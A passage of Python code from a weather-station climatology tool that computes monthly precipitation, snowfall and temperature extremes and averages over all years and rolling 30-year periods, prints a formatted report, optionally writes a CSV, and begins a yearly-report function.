< alltime["prcpPROP"]["month_min"][0]: alltime["prcpPROP"]["month_min"][0] = sum(clmt[y][m]["prcp"]) alltime["prcpPROP"]["month_min"][1] = [] alltime["prcpPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(clmt[y][m]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += clmt[y][m]["prcpDAYS"] climo30yrs[c]["total_days"] += clmt[y][m]["recordqty"] if clmt[y][m]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["month_max_days"][0]: climo30yrs[c]["prcpPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["month_max_days"][0]: climo30yrs[c]["prcpPROP"]["month_max_days"][0] = clmt[y][m]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["month_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == climo30yrs[c]["prcpPROP"]["month_max"][0]: climo30yrs[c]["prcpPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["prcp"]) > climo30yrs[c]["prcpPROP"]["month_max"][0]: climo30yrs[c]["prcpPROP"]["month_max"][0] = sum(clmt[y][m]["prcp"]) climo30yrs[c]["prcpPROP"]["month_max"][1] = [] climo30yrs[c]["prcpPROP"]["month_max"][1].append(y) if clmt[y][m]["recordqty"] > excludemonth: if clmt[y][m]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["month_min_days"][0]: climo30yrs[c]["prcpPROP"]["month_min_days"][1].append(y) elif clmt[y][m]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["month_min_days"][0]: climo30yrs[c]["prcpPROP"]["month_min_days"][0] = clmt[y][m]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["month_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["month_min_days"][1].append(y) if sum(clmt[y][m]["prcp"]) == climo30yrs[c]["prcpPROP"]["month_min"][0]: climo30yrs[c]["prcpPROP"]["month_min"][1].append(y) elif sum(clmt[y][m]["prcp"]) < climo30yrs[c]["prcpPROP"]["month_min"][0]: climo30yrs[c]["prcpPROP"]["month_min"][0] = sum(clmt[y][m]["prcp"]) 
climo30yrs[c]["prcpPROP"]["month_min"][1] = [] climo30yrs[c]["prcpPROP"]["month_min"][1].append(y) # SNOW alltime["snow"].append(sum(clmt[y][m]["snow"])) alltime["snowPROP"]["days"] += clmt[y][m]["snowDAYS"] if clmt[y][m]["snowDAYS"] == alltime["snowPROP"]["month_max_days"][0]: alltime["snowPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["snowDAYS"] > alltime["snowPROP"]["month_max_days"][0]: alltime["snowPROP"]["month_max_days"][0] = clmt[y][m]["snowDAYS"] alltime["snowPROP"]["month_max_days"][1] = [] alltime["snowPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["snow"]) == alltime["snowPROP"]["month_max"][0]: alltime["snowPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["snow"]) > alltime["snowPROP"]["month_max"][0]: alltime["snowPROP"]["month_max"][0] = sum(clmt[y][m]["snow"]) alltime["snowPROP"]["month_max"][1] = [] alltime["snowPROP"]["month_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(clmt[y][m]["snow"])) climo30yrs[c]["snowPROP"]["days"] += clmt[y][m]["snowDAYS"] if clmt[y][m]["snowDAYS"] == climo30yrs[c]["snowPROP"]["month_max_days"][0]: climo30yrs[c]["snowPROP"]["month_max_days"][1].append(y) elif clmt[y][m]["snowDAYS"] > climo30yrs[c]["snowPROP"]["month_max_days"][0]: climo30yrs[c]["snowPROP"]["month_max_days"][0] = clmt[y][m]["snowDAYS"] climo30yrs[c]["snowPROP"]["month_max_days"][1] = [] climo30yrs[c]["snowPROP"]["month_max_days"][1].append(y) if sum(clmt[y][m]["snow"]) == climo30yrs[c]["snowPROP"]["month_max"][0]: climo30yrs[c]["snowPROP"]["month_max"][1].append(y) elif sum(clmt[y][m]["snow"]) > climo30yrs[c]["snowPROP"]["month_max"][0]: climo30yrs[c]["snowPROP"]["month_max"][0] = sum(clmt[y][m]["snow"]) climo30yrs[c]["snowPROP"]["month_max"][1] = [] climo30yrs[c]["snowPROP"]["month_max"][1].append(y) for x in clmt[y][m]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) 
if len(clmt[y][m]["tempAVGlist"]) > excludemonth_tavg: alltime["tempAVGlist"].append(mean(clmt[y][m]["tempAVGlist"])) if mean(clmt[y][m]["tempAVGlist"]) == alltime["tavgPROP"]["month_max"][0]: alltime["tavgPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) > alltime["tavgPROP"]["month_max"][0]: alltime["tavgPROP"]["month_max"][0] = mean(clmt[y][m]["tempAVGlist"]) alltime["tavgPROP"]["month_max"][1] = [] alltime["tavgPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tempAVGlist"]) == alltime["tavgPROP"]["month_min"][0]: alltime["tavgPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) < alltime["tavgPROP"]["month_min"][0]: alltime["tavgPROP"]["month_min"][0] = mean(clmt[y][m]["tempAVGlist"]) alltime["tavgPROP"]["month_min"][1] = [] alltime["tavgPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y][m]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(clmt[y][m]["tempAVGlist"]) > excludemonth_tavg: climo30yrs[c]["tempAVGlist"].append(mean(clmt[y][m]["tempAVGlist"])) if mean(clmt[y][m]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["month_max"][0]: climo30yrs[c]["tavgPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["month_max"][0]: climo30yrs[c]["tavgPROP"]["month_max"][0] = mean(clmt[y][m]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["month_max"][1] = [] climo30yrs[c]["tavgPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["month_min"][0]: climo30yrs[c]["tavgPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["month_min"][0]: climo30yrs[c]["tavgPROP"]["month_min"][0] = mean(clmt[y][m]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["month_min"][1] = [] climo30yrs[c]["tavgPROP"]["month_min"][1].append(y) # TMAX for x in 
clmt[y][m]["tmax"]: alltime["tmax"].append(x) if len(clmt[y][m]["tmax"]) > excludemonth: if mean(clmt[y][m]["tmax"]) == alltime["tmaxPROP"]["month_max"][0]: alltime["tmaxPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tmax"]) > alltime["tmaxPROP"]["month_max"][0]: alltime["tmaxPROP"]["month_max"][0] = mean(clmt[y][m]["tmax"]) alltime["tmaxPROP"]["month_max"][1] = [] alltime["tmaxPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmax"]) == alltime["tmaxPROP"]["month_min"][0]: alltime["tmaxPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmax"]) < alltime["tmaxPROP"]["month_min"][0]: alltime["tmaxPROP"]["month_min"][0] = mean(clmt[y][m]["tmax"]) alltime["tmaxPROP"]["month_min"][1] = [] alltime["tmaxPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y][m]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(clmt[y][m]["tmax"]) > excludemonth: if mean(clmt[y][m]["tmax"]) == climo30yrs[c]["tmaxPROP"]["month_max"][0]: climo30yrs[c]["tmaxPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tmax"]) > climo30yrs[c]["tmaxPROP"]["month_max"][0]: climo30yrs[c]["tmaxPROP"]["month_max"][0] = mean(clmt[y][m]["tmax"]) climo30yrs[c]["tmaxPROP"]["month_max"][1] = [] climo30yrs[c]["tmaxPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmax"]) == climo30yrs[c]["tmaxPROP"]["month_min"][0]: climo30yrs[c]["tmaxPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmax"]) < climo30yrs[c]["tmaxPROP"]["month_min"][0]: climo30yrs[c]["tmaxPROP"]["month_min"][0] = mean(clmt[y][m]["tmax"]) climo30yrs[c]["tmaxPROP"]["month_min"][1] = [] climo30yrs[c]["tmaxPROP"]["month_min"][1].append(y) # TMIN for x in clmt[y][m]["tmin"]: alltime["tmin"].append(x) if len(clmt[y][m]["tmin"]) > excludemonth: if mean(clmt[y][m]["tmin"]) == alltime["tminPROP"]["month_max"][0]: alltime["tminPROP"]["month_max"][1].append(y) elif 
mean(clmt[y][m]["tmin"]) > alltime["tminPROP"]["month_max"][0]: alltime["tminPROP"]["month_max"][0] = mean(clmt[y][m]["tmin"]) alltime["tminPROP"]["month_max"][1] = [] alltime["tminPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmin"]) == alltime["tminPROP"]["month_min"][0]: alltime["tminPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmin"]) < alltime["tminPROP"]["month_min"][0]: alltime["tminPROP"]["month_min"][0] = mean(clmt[y][m]["tmin"]) alltime["tminPROP"]["month_min"][1] = [] alltime["tminPROP"]["month_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y][m]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(clmt[y][m]["tmin"]) > excludemonth: if mean(clmt[y][m]["tmin"]) == climo30yrs[c]["tminPROP"]["month_max"][0]: climo30yrs[c]["tminPROP"]["month_max"][1].append(y) elif mean(clmt[y][m]["tmin"]) > climo30yrs[c]["tminPROP"]["month_max"][0]: climo30yrs[c]["tminPROP"]["month_max"][0] = mean(clmt[y][m]["tmin"]) climo30yrs[c]["tminPROP"]["month_max"][1] = [] climo30yrs[c]["tminPROP"]["month_max"][1].append(y) if mean(clmt[y][m]["tmin"]) == climo30yrs[c]["tminPROP"]["month_min"][0]: climo30yrs[c]["tminPROP"]["month_min"][1].append(y) elif mean(clmt[y][m]["tmin"]) < climo30yrs[c]["tminPROP"]["month_min"][0]: climo30yrs[c]["tminPROP"]["month_min"][0] = mean(clmt[y][m]["tmin"]) climo30yrs[c]["tminPROP"]["month_min"][1] = [] climo30yrs[c]["tminPROP"]["month_min"][1].append(y) # PRINT REPORT print("--------------------------------") print("Climatology Report for {}".format(calendar.month_name[m])) print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("--------------------------------") print("Part 1: {} Precipitation Stats".format(calendar.month_name[m])) print("{:▒^9} {:▒^11} {:▒^8} 
{:▒^8} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^8} {:▒^6} {:▒^12} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^11} {:▒^8} {:▒^8} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^8} {:▒^6} {:▒^12} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^11} {:-^8} {:-^8} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^8} {:-^6} {:-^12} |".format("","","","","","","","","","","")) print("{:^9} {:4}:{:>5}% {:>2}, {:^4} {:>2}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>2}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["month_max_days"][0], alltime["prcpPROP"]["month_max_days"][1][0] if len(alltime["prcpPROP"]["month_max_days"][1]) == 1 else len(alltime["prcpPROP"]["month_max_days"][1]), alltime["prcpPROP"]["month_min_days"][0], alltime["prcpPROP"]["month_min_days"][1][0] if len(alltime["prcpPROP"]["month_min_days"][1]) == 1 else len(alltime["prcpPROP"]["month_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["month_max"][0],2), alltime["prcpPROP"]["month_max"][1][0] if len(alltime["prcpPROP"]["month_max"][1]) == 1 else len(alltime["prcpPROP"]["month_max"][1]), round(alltime["prcpPROP"]["month_min"][0],2), alltime["prcpPROP"]["month_min"][1][0] if len(alltime["prcpPROP"]["month_min"][1]) == 1 else len(alltime["prcpPROP"]["month_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["month_max_days"][0], alltime["snowPROP"]["month_max_days"][1][0] if len(alltime["snowPROP"]["month_max_days"][1]) == 1 else len(alltime["snowPROP"]["month_max_days"][1]), round(mean(alltime["snow"]),1) 
if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["month_max"][0],2), alltime["snowPROP"]["month_max"][1][0] if len(alltime["snowPROP"]["month_max"][1]) == 1 else len(alltime["snowPROP"]["month_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) #print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:4}:{:>5}% {:>2}, {:^4} {:>2}, {:^4} {:^6.2f} {:>5.2f}, {:^5} {:>5}, {:^5} | {:4}:{:>5}% {:>2}, {:^4} {:^6.1f} {:>5.1f}, {:^5} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["month_max_days"][0], climo30yrs[c]["prcpPROP"]["month_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_max_days"][1]), climo30yrs[c]["prcpPROP"]["month_min_days"][0], climo30yrs[c]["prcpPROP"]["month_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["month_max"][0],2), climo30yrs[c]["prcpPROP"]["month_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_max"][1]), round(climo30yrs[c]["prcpPROP"]["month_min"][0],2), climo30yrs[c]["prcpPROP"]["month_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["month_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["month_max_days"][0], climo30yrs[c]["snowPROP"]["month_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["month_max_days"][1]) == 1 else 
len(climo30yrs[c]["snowPROP"]["month_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["month_max"][0],2), climo30yrs[c]["snowPROP"]["month_max"][1][0] if len(climo30yrs[c]["snowPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["month_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: {} Temperature Stats".format(calendar.month_name[m])) print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"month_max":[-999,[]],"month_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["month_max"][0],1), alltime["tavgPROP"]["month_max"][1][0] if len(alltime["tavgPROP"]["month_max"][1]) == 1 else len(alltime["tavgPROP"]["month_max"][1]), round(alltime["tavgPROP"]["month_min"][0],1), alltime["tavgPROP"]["month_min"][1][0] if len(alltime["tavgPROP"]["month_min"][1]) == 1 else len(alltime["tavgPROP"]["month_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["month_max"][0],1), alltime["tmaxPROP"]["month_max"][1][0] if len(alltime["tmaxPROP"]["month_max"][1]) == 1 else len(alltime["tmaxPROP"]["month_max"][1]), round(alltime["tmaxPROP"]["month_min"][0],1), 
alltime["tmaxPROP"]["month_min"][1][0] if len(alltime["tmaxPROP"]["month_min"][1]) == 1 else len(alltime["tmaxPROP"]["month_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["month_max"][0],1), alltime["tminPROP"]["month_max"][1][0] if len(alltime["tminPROP"]["month_max"][1]) == 1 else len(alltime["tminPROP"]["month_max"][1]), round(alltime["tminPROP"]["month_min"][0],1), alltime["tminPROP"]["month_min"][1][0] if len(alltime["tminPROP"]["month_min"][1]) == 1 else len(alltime["tminPROP"]["month_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["month_max"][0],1), climo30yrs[c]["tavgPROP"]["month_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["month_max"][1]), round(climo30yrs[c]["tavgPROP"]["month_min"][0],1), climo30yrs[c]["tavgPROP"]["month_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["month_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["month_max"][0],1), climo30yrs[c]["tmaxPROP"]["month_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["month_max"][1]), round(climo30yrs[c]["tmaxPROP"]["month_min"][0],1), climo30yrs[c]["tmaxPROP"]["month_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["month_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["month_max"][0],1), 
climo30yrs[c]["tminPROP"]["month_max"][1][0] if len(climo30yrs[c]["tminPROP"]["month_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["month_max"][1]), round(climo30yrs[c]["tminPROP"]["month_min"][0],1), climo30yrs[c]["tminPROP"]["month_min"][1][0] if len(climo30yrs[c]["tminPROP"]["month_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["month_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "monthReport_" + str(calendar.month_name[m]) + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period ({})".format(str(calendar.month_name[m])),"PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tempAVGlist_ind"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") 
w.write("{:.1f}".format(round(mean(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmin"]),1))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tempAVGlist_ind"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmin"]),1))); w.write("\n") print("*** csv output successful ***") def yearReport(climatology=30,increment=5,output=False): """Detailed Climatological Report all calendar years on record * no required arguments * Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. 
The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: yearReport() -> Returns a 30-yr, 5-yr incremented climatological report for all calendar years on record yearReport(climatology=10) -> Returns a 10-yr, 5-yr incremented climatological report for all years. yearReport(climatology=20,increment=1,output=True) -> Returns a 1-yr incremented, 20yr climatology report for all years and outputs a CSV. """ valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": [],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"year_max_days":[-1,[]],"year_min_days":[999,[]],"year_max":[-1,[]],"year_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"year_max_days":[-1,[]],"year_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmax": 
[],"tmaxPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, "tmin": [],"tminPROP":{"year_max":[-999,[]],"year_min":[999,[]]}} print("*** PLEASE WAIT. This will take a few moments ***") for y in valid_yrs: alltime["total_days"] += clmt[y]["recordqty"] # PRCP alltime["prcp"].append(sum(clmt[y]["prcp"])) alltime["prcpPROP"]["days"] += clmt[y]["prcpDAYS"] if clmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][1].append(y) elif clmt[y]["prcpDAYS"] > alltime["prcpPROP"]["year_max_days"][0]: alltime["prcpPROP"]["year_max_days"][0] = clmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_max_days"][1] = [] alltime["prcpPROP"]["year_max_days"][1].append(y) if sum(clmt[y]["prcp"]) == alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][1].append(y) elif sum(clmt[y]["prcp"]) > alltime["prcpPROP"]["year_max"][0]: alltime["prcpPROP"]["year_max"][0] = sum(clmt[y]["prcp"]) alltime["prcpPROP"]["year_max"][1] = [] alltime["prcpPROP"]["year_max"][1].append(y) if clmt[y]["recordqty"] > excludeyear: if clmt[y]["prcpDAYS"] == alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][1].append(y) elif clmt[y]["prcpDAYS"] < alltime["prcpPROP"]["year_min_days"][0]: alltime["prcpPROP"]["year_min_days"][0] = clmt[y]["prcpDAYS"] alltime["prcpPROP"]["year_min_days"][1] = [] alltime["prcpPROP"]["year_min_days"][1].append(y) if sum(clmt[y]["prcp"]) == alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][1].append(y) elif sum(clmt[y]["prcp"]) < alltime["prcpPROP"]["year_min"][0]: alltime["prcpPROP"]["year_min"][0] = sum(clmt[y]["prcp"]) alltime["prcpPROP"]["year_min"][1] = [] alltime["prcpPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(clmt[y]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += clmt[y]["prcpDAYS"] climo30yrs[c]["total_days"] 
